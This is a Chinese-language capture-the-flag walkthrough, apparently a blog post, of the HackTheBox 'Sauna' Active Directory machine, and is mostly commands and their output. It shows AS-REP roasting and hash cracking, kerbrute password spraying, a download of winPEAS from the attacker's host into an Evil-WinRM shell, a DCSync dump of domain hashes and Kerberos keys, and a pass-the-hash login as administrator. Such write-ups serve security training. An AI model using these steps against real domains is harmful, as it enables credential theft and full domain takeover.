HackTheBox - Sauna
第一次做域的模拟入侵,参考了很多,还是发现以下问题。
1、域用户名命名规则
2、提权
3、主要还是思路问题
一开始思路就错了,把重点放在了破解域用户密码上,忽视了TGT票据。《挂机一天一夜,满内存跑 rockyou.txt,服了》
刚刚发现,HTB 的各个机器是相互ping通的,破解密码前可以把字典上传到已 root 机器上,速度会大增。唯一不足就是容易被 reset。
扫描端口
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-05-01 15:57:04Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped 80没有价值信息,用metasploit 开始枚举了用户名【sauna,hsmith,administrator】这里的思路就是破解 hsmith 用户名密码,<i716g的内存满负荷跑了一天一夜,泪>。
python3 ./GetNPUsers.py EGOTISTICAL-BANK.LOCAL/ -usersfile ~/Desktop/sauna/sauna.txt -dc-ip 10.10.10.175
python3 ./GetNPUsers.py EGOTISTICAL-BANK.LOCAL/ -no-pass -usersfile ~/Desktop/sauna/sauna.txt -dc-ip 10.10.10.175 -format john -outputfile ~/Desktop/out1.txt
./GetUserSPNs.py EGOTISTICAL-BANK.LOCAL/administrator -dc-ip 10.10.10.175 -no-pass -save
//这个kerbrute 太耗内存了。即使跑一个线程也能把资源耗死
python kerbrute.py -users /usr/share/wordlists/rockyou.txt -domain EGOTISTICAL-BANK.LOCAL -threads 1
sudo python3 ./kerbrute.py -users ~/Desktop/sauna/sauna.txt -domain EGOTISTICAL-BANK.LOCAL -passwords ~/Desktop/sauna/xaf -outputfile ~/Desktop/out.txt
sudo python3 ./kerbrute.py -users ~/Desktop/sauna/sauna.txt -domain EGOTISTICAL-BANK.LOCAL -dc-ip 10.10.10.175 -passwords /usr/share/wordlists/rockyou.txt -outputfile ~/Desktop/out.txt
通过枚举倒是获取了域ID,和一些信息。但还是没有突破性进度。
enum4linux
god@win7:~$ enum4linux 10.10.10.175
Domain Name: EGOTISTICALBANK
Domain Sid: S-1-5-21-2966785786-3096785034-1186376766 可以获取 hsmith密码,但是需要检查很长时间,密码是正确的,没有登录成功提示。需要手动去检查日志,因为密码过期了。《后面才知道》
突破性进展,获取了 fsmith 用户信息。真坑啊。一开始把注意力焦点放在了 hsmith 这个用户上花了大把时间。
python3 ./GetNPUsers.py EGOTISTICAL-BANK.LOCAL/ -k -usersfile ~/Desktop/user.txt -dc-ip 10.10.10.175 -format john -outputfile ~/Desktop/out1.txt -debug
$krb5asrep$fsmith@EGOTISTICAL-BANK.LOCAL:e7518ac5963903ebf7c2be87354f354d$652303eb37c9c4494d81c7d96e617d39cedb27b08e2a5b5920b482d85d19ea220e39514ef01992e7e869b18bdc0c3860857837640487e814fa6023bddfb5cd942241059398cf195a81808b030bfdada05ea8c18977733b4fc0330561560bfe9363aa7d7fd930cad327d0461864dfc9fe503cb8f613ef2e37786683be6bccd998efcf95432429c9f02154bfdbf5126f98fef0a9757301dc1d89e513d5816147b7fc6ca35ad2e51ccbcd8e3a3373681e917d1b51d5d009c5f80a54dc769617b7f64a72b541805b770717b49e1fdcb322f9e2609f9dade5ba42413ab7e9ef90b38097343f947e0a7f3abb5e281d2cf0d29404237517fe132f8186b2054b8e47f72fgod@win7:~/project/impacket/examples$ /usr/sbin/john --wordlist=/usr/share/wordlists/rockyou.txt ~/Desktop/out1.txt获取密码:Thestrokes23
god@win7:~/project/impacket/examples$ ./GetADUsers.py EGOTISTICAL-BANK.LOCAL/fsmith:Thestrokes23 -dc-ip 10.10.10.175 -all Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation [*] Querying 10.10.10.175 for information about domain. Name Email PasswordLastSet LastLogon -------------------- ------------------------------ ------------------- ------------------- Administrator 2020-01-24 12:14:15.321116 2020-02-10 11:16:17.478519 Guest <never> <never> krbtgt 2020-01-23 00:45:30.587720 <never> HSmith 2020-01-23 00:54:34.140321 <never> FSmith 2020-01-23 11:45:19.047096 2020-05-02 07:42:57.864912 svc_loanmgr 2020-01-24 18:48:31.678079
目前已知的用户名已有
administrator
guest
krbtgt
Hsmith
Fsmith > 已经获取
svc_loanmgr
通过 Evil-WinRM 连接后,检查出来
*Evil-WinRM* PS C:\Users\FSmith\Documents> Invoke-WebRequest http://10.10.14.231/winPEAS.exe -O winPEAS.exe
[+] Looking for AutoLogon credentials(T1012)
Some AutoLogon credentials were found!!
DefaultDomainName : 35mEGOTISTICALBANK
DefaultUserName : 35mEGOTISTICALBANK\svc_loanmanager
DefaultPassword : Moneymakestheworldgoround!
[+] Looking AppCmd.exe()
[?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#appcmd-exe
AppCmd.exe was found in C:\Windows\system32\inetsrv\appcmd.exe You should try to search for credentials 配置了一个自动登录的账户信息,AppCmd.exe 没找到有使用的地方。
获取administrator
god@win7:~/project/impacket/examples$ ./secretsdump.py EGOTISTICAL-BANK.LOCAL/svc_loanmgr:"Moneymakestheworldgoround!"@10.10.10.175
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:e00cf6141ad7e04cf4b0517f95eeb856:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031
Administrator:aes128-cts-hmac-sha1-96:145e4d0e4a6600b7ec0ece74997651d0
Administrator:des-cbc-md5:19d5f15d689b1ce5
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:5a005c3b83a7e11dc0eefa570fd8a262873226631d9b836758686ae291a51a25
SAUNA$:aes128-cts-hmac-sha1-96:d3eb2899ffb200fd4f6d2a4a5c134705
SAUNA$:des-cbc-md5:104c515b86739e08
[*] Cleaning up... 然后到这里,试了下网上的方法,竟然执行成功了。
最后获取 root.txt
god@win7:~$ evil-winrm -i 10.10.10.175 -u administrator -H d9485863c1e9e05851aa40cbb4ab9dff
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
whoami
egotisticalbank\administrator
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/23/2020 10:22 AM 32 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
f3ee04965c68257382e31502cc5e881f
评论
发表评论